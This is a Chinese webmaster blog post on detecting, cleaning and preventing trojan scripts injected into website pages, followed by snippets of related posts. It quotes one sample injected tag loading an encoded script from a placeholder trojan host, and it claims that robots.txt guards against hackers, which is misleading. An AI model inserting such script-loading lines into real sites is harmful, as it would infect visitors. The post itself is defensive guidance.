Categories


Tags


如何预防和检测网页挂马?

在网站优化设计当中,检测网页木马也是很重要的一项工作,目前流行的网站被黑,是在相应的asp,htm,js等文件中,插入以js调用方式的。本文主要介绍网页挂马的种类、如何检测网页是否被挂马、如何清除网页木马。如何防止网页被挂马。

1:网页挂马的种类.

目前流行的网站被黑,是在相应的asp,htm,js等文件中,插入以js调用方式的。更详细的资料,请点击查看挂马代码大全。

卢松松以前做过的‘极品源码下载站’就遇到过JS挂马

<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>

&lsquo;校园闹翻天论坛&rsquo;就遇到用户提权,利用动网程序漏洞(上传附件漏洞)拥有网站管理员权限。删了论坛几千条数据,一千多位会员的ID

2:如何检测网页是否被挂马。

(1):专业检测工具,六款免费网页安全检测工具横向测评(华军软件园)点此进入

(2):Google检测,或者可以利用Google搜索你的网站、博客进行检测。如果有网站有木马则google会在搜索列表的下方提示该网站有不安全因素。

(3):杀毒软件检测,常用的杀毒软件也可以检测出来。

(4):人工检测,打开你的网站、博客,点击右键查看源文件,根据网页挂马的种类也可以查看是否中了木马。

(5):使用McAfee SiteAdvisor安全浏览网页的插件。例:检测卢松松博客是否安全可点此查看。

如何预防和检测网页挂马? 网站安全 SEO推广 第1张

3:如何清除网页木马。

一旦中了网页木马,就看那些文件是最近修改过的,主要查看这些新文件,(从FTP中可以查看文件最近修改时间。)然后进入源文件把相关的网页挂马种类的可疑代码删除。

如果你对你所使用的网站、博客程序不熟悉,建议删除所有文件(数据库、图片、文档、程序模板主题等文件夹可以保留)

4:如何防止网页被挂马。如果你的网站还没有被挂马,请从预防开始吧。

(1):对网友开放上传附件功能的网站一定要进行身份认证,并只允许信任的人使用上传程序。

(2):保证你所使用的程序及时的更新。

(3):不要在前台网页上加注后台管理程序登陆页面的链接。

(4):要时常备份数据库等重要文件,但不要把备份数据库放在程序默认的备份目录下。

(5):管理员的用户名和密码要有一定复杂性,不能过于简单。

(6):IIS中禁止写入和目录禁止执行的功能,二项功能组合,可以有效的防止ASP木马。

(7):可以在服务器、虚拟主机控制面板,设置执行权限选项中,直接将有上传权限的目录,取消ASP的运行权限。

(8):创建一个robots.txt上传到网站根目录。Robots能够有效的防范利用搜索引擎窃取信息的骇客。 点此查看robots.txt使用方法。

来源:卢松松博客


Public @ 2014-10-23 15:37:43

剖析SEO流量问题

SEO流量问题通常涉及排名、内容优化、页面质量和持续更新等方面,以下是一些常见的剖析方法: 1. 排名问题 排名是SEO流量的基础,因此要分析导致排名下降的原因,比如竞争对手的SEO策略改变、搜索引擎算法变化等。同时,也要进行关键词研究,了解用户搜索习惯和需求,以便优化内容和网站结构。 2. 内容问题 内容是吸引流量的关键,因此要确保内容质量高、原创性强、关键词密度适中、页面结构清晰等,以

Public @ 2023-06-21 07:50:18

企业网站常见耗资源、大流量、被挂马的原因分析与对策

企业网站是公司展示形象、宣传产品、服务客户的重要平台,但也存在一些安全问题,主要包括以下方面: 1. 网站耗资源:企业网站可能因为服务器配置不当、代码不规范等问题,导致访问速度慢、页面加载缓慢等。此类问题通常需要对服务器进行优化和升级,或者对编码进行优化。 2. 大流量攻击:企业网站因为知名度高或者服务质量好,很容易成为黑客攻击的目标。黑客会通过DDoS攻击(分布式拒绝服务攻击)等方式,让大量

Public @ 2023-06-21 06:50:23

我的网站被360提示被挂马有风险怎么处理

首先,清理空间里的挂马代码,保证空间能够正常访问。A:如果您希望能够尽快去掉挂马风险提示,360网站监测中心为注册用户提供了一个立即重新检测的功能,以解站长们的燃眉之急。具体操作方法为:1.登录360网站监测中心(http://jc.360.cn)。首次注册需要先添加网站。2.进入重新检测功能栏。3. 找到需要检测的网站,点击“重新检测”,等待检测结果即可,最新的扫描结果将在最长一个小时内给出。注

Public @ 2014-07-07 15:37:40

更多您感兴趣的搜索

0.657530s